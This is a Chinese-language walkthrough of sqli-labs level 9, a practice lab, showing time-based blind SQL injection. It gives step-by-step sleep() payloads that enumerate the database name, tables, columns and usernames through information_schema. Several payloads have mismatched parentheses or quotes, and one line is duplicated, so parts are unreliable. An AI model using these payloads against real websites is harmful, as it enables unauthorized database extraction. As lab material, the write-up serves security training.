sqli-labs less-9
本关和前几关的注入方式又不一样,不过我们还是按步骤来
* 判断注入
首先输入?id=1 回显正常
?id=1' 回显正常
?id=1" 回显正常
由此可知,本关没有布尔类型状态,输入语句的正确与否回显均为You are in…,故本关采用延时注入的方式
我们需要用到sleep函数
?id=1' and (sleep(5)) --+ 耗时7秒
?id=1 and (sleep(5)) --+ 耗时2秒
由此可知,注入方式为单引号注入
* 查询详细信息
-
数据库长度
?id=1' and if (length(database())=8,sleep(5),1) --+
若回显时长为7秒,则回显正常,数据库长度为8
-
数据库名
?id=1' and if (substr(database(),1,1)='s',sleep(5),1) --+ (或?id=1' and if (ascii(substr(database(),1,1)=115),sleep(5),1) --+ ->'s') ?id=1' and if (substr(database(),2,1)='e',sleep(5),1) --+ ?id=1' and if (substr(database(),3,1)='c',sleep(5),1) --+ ?id=1' and if (substr(database(),4,1)='u',sleep(5),1) --+ ?id=1' and if (substr(database(),5,1)='r',sleep(5),1) --+ ?id=1' and if (substr(database(),6,1)='i',sleep(5),1) --+ ?id=1' and if (substr(database(),7,1)='t',sleep(5),1) --+ ?id=1' and if (substr(database(),8,1)='y',sleep(5),1) --+
-
库中表的个数
?id=1' and if ((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1) --+
-
求表名
?id=1' and if ((select table_name from information_schema.tables where table_schema='security' limit 0,1)='emails',sleep(5),1) --+ ?id=1' and if ((select table_name from information_schema.tables where table_schema='security' limit 1,1)='referers',sleep(5),1) --+ ?id=1' and if ((select table_name from information_schema.tables where table_schema='security' limit 2,1)='uagents',sleep(5),1) --+ ?id=1' and if ((select table_name from information_schema.tables where table_schema='security' limit 3,1)='users',sleep(5),1) --+
-
列的长度
?id=1' and if ((select count(column_name) from information_schema.columns where table_name='users')=3,sleep(5),1) --+
-
列名
?id=1' and if (substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='i',sleep(5),1) --+ (或?id=1" and if (ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 0,1),1,1)) = 105 --+ ->i) ?id=1' and if (substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1)='d',sleep(5),1) --+
由此可知,列一:id
同理:
列二:username
列三:password
-
求表中某字段的数量
?id=1' and if((select count(username) from users) = 13,sleep(5),1) --+ 可知该字段的数量为13
-
求字段的长度
?id=1' and if (length(username)=4,sleep(5),1) --+
-
求字段名
?id=1' and if (ascii(substr((select username from users limit 0,1),1,1)) = 68,sleep(5),1) --+ ->d ?id=1' and if (ascii(substr((select username from users limit 0,1),2,1))= 117),sleep(5),1) --+ ->u ?id=1" and if (ascii(substr((select username from users limit 0,1),2,1)) = 109,sleep(5),1) --+ ->m ?id=1" and if (ascii(substr((select username from users limit 0,1),4,1)) = 98,sleep(5),1) --+ ->b ?id=1" and if (ascii(substr((select username from users limit 0,1),4,1)) = 98,sleep(5),1) --+ ->b
即完成